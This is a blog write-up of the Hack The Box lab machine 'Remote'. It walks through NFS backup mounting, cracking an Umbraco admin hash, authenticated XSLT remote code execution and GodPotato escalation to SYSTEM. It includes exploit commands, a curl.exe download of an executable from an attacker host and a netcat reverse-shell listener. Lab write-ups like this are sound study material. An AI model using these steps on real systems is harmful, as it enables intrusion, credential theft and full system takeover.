SverzBlog

Remote - HTB

5 min read

Remote // Hack The Box

InfoValue
OSWindows
DifficultyEasy
IP10.129.x.x
Hostnameremote.htb
ServicesFTP (21), HTTP (80), RPC (111), SMB (135/139/445), NFS (2049), WinRM (5985)

Enumeration

Nmap

sudo nmap -Pn -sC -sV -p- -vvv -oA scan/nmap.scan remote.htb
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0

Open ports:

  • 21/tcp // FTP — Microsoft ftpd, anonymous login allowed (empty, no write)
  • 80/tcp // HTTP — “Acme Widgets” website running Umbraco CMS
  • 111/tcp // rpcbind — NFS services registered (mountd, nlockmgr, status)
  • 135/139/445 // SMB/RPC — signing enabled but not required, no null session access
  • 2049/tcp // NFS — critical attack surface
  • 5985/tcp // WinRM — potential remote shell with valid credentials

FTP Enumeration

Anonymous login allowed but the root directory is empty and write permissions are denied. Dead end.

SMB Enumeration

No accessible shares with null session. Dead end.

NFS Enumeration

showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

The /site_backups share is accessible to everyone — this is a full backup of the Umbraco web application.

sudo mount -t nfs remote.htb:/site_backups /mnt/

Web Enumeration

The web application on port 80 is an Umbraco CMS instance. Directory enumeration with feroxbuster revealed:

  • /umbraco — admin login panel
  • /install — redirects to /umbraco/
  • /intranet, /blog, /products, /people, /contact — content pages

The NFS backup confirms the exact Umbraco version and provides direct access to application data files.

Foothold // Umbraco Authenticated RCE

Credential Extraction from NFS Backup

The NFS share contains the full Umbraco application. The key file is the embedded database:

strings /mnt/App_Data/Umbraco.sdf | grep -i admin@htb.local
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.local

Three users found:

  • admin@htb.local — SHA1 hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
  • smith@htb.local — HMACSHA256 hash (salted, not directly crackable)
  • ssmith@htb.local — HMACSHA256 hash (salted, not directly crackable)

Hash Cracking

echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > admin.sha1
hashcat -m 100 admin.sha1 /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Credentials: admin@htb.local:baconandcheese

Umbraco RCE // Exploit-DB #46153

Vulnerability

Umbraco CMS 7.12.4 — Authenticated remote code execution via XSLT stylesheet injection. The /umbraco/developer/Xslt/xsltVisualize.aspx endpoint allows authenticated administrators to upload and execute XSLT templates. A crafted XSLT payload containing inline C# code executes arbitrary commands on the server via System.Diagnostics.Process.

Structural root cause: the XSLT visualization feature trusts authenticated admin users to provide safe stylesheets, but XSLT supports embedded scripting (msxsl:script) that executes native code — no sandboxing or content filtering is applied.

Ref: https://www.exploit-db.com/exploits/46153

Exploitation

Used a Python exploit for Umbraco authenticated RCE:

python exploit.py -u admin@htb.local -p baconandcheese -w 'http://remote.htb' -i <ATTACKER_IP>
[*] Logging in at http://remote.htb/umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://remote.htb/umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>

Shell obtained as iis apppool\defaultapppool.

User flag: obtained.

Privilege Escalation // GodPotato (SeImpersonatePrivilege)

Vulnerability

SeImpersonatePrivilege abuse — IIS application pool accounts run with SeImpersonatePrivilege, which allows the process to impersonate any token it can obtain. GodPotato exploits the DCOM/RPCSS activation to coerce NT AUTHORITY\SYSTEM into authenticating, then impersonates that token for arbitrary command execution as SYSTEM.

Structural root cause: Windows grants SeImpersonatePrivilege to service accounts by default. Combined with the ability to trigger DCOM object activation (which authenticates as SYSTEM), any service account can escalate to full system privileges.

Exploitation

# Transfer GodPotato to target
PS C:\Windows\Temp> curl.exe http://<ATTACKER_IP>/GodPotato-NET2.exe -o C:\Windows\Temp\GodPotato.exe
PS C:\Windows\Temp> ./GodPotato.exe -cmd "cmd /c whoami"
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] Start Search System Token
[*] PID : 848 Token:0x800  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] CurrentUser: NT AUTHORITY\SYSTEM
nt authority\system

Reverse Shell as SYSTEM

Used GodPotato to execute a PowerShell reverse shell payload:

# Listener on attacker
nc -nvlp 443
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.x.x] 49697
PS C:\Windows\Temp> whoami
nt authority\system

Root flag: obtained.

Attack Chain Summary

Nmap → 9 services, NFS share /site_backups accessible to everyone
       ↓
  Mount NFS → App_Data/Umbraco.sdf → admin@htb.local SHA1 hash
       ↓
  hashcat -m 100 → baconandcheese → Umbraco admin login
       ↓
  Umbraco authenticated RCE (XSLT injection) → shell as IIS AppPool
       ↓
  user.txt (C:\Users\Public\user.txt)
       ↓
  SeImpersonatePrivilege → GodPotato → NT AUTHORITY\SYSTEM
       ↓
  root.txt

Flags

  • User: obtained (as iis apppool\defaultapppool)
  • Root: obtained (as nt authority\system)

Lessons Learned

  • NFS shares on Windows are rare and high-value: When NFS is exposed on a Windows host, it almost always contains sensitive data. Always check showmount -e and mount every available share.
  • Embedded databases in web app backups: Umbraco uses .sdf (SQL Server Compact) as an embedded database. strings is sufficient to extract hashes — no need for specialized tools. Always look in App_Data/ for .NET applications.
  • SHA1 vs HMACSHA256: The admin account used plain SHA1 (hashcat mode 100, cracks instantly), while other accounts used salted HMACSHA256. Target the weakest hash algorithm first.
  • SeImpersonatePrivilege is a guaranteed SYSTEM path: Any Windows service account (IIS, MSSQL, etc.) with this privilege can escalate via potato attacks. Check whoami /priv immediately after landing a shell.
  • Umbraco XSLT RCE requires admin: The exploit targets the developer section’s XSLT visualizer — only accessible to admin accounts. Lower-privilege Umbraco accounts (editors, writers) cannot trigger it.

Timeline

  • Total time: ~2h
  • Where I spent the most time: Credential hunting in the NFS share and troubleshooting Umbraco login (required machine restart)
  • Subjective difficulty: 3/10

Graph View

Backlinks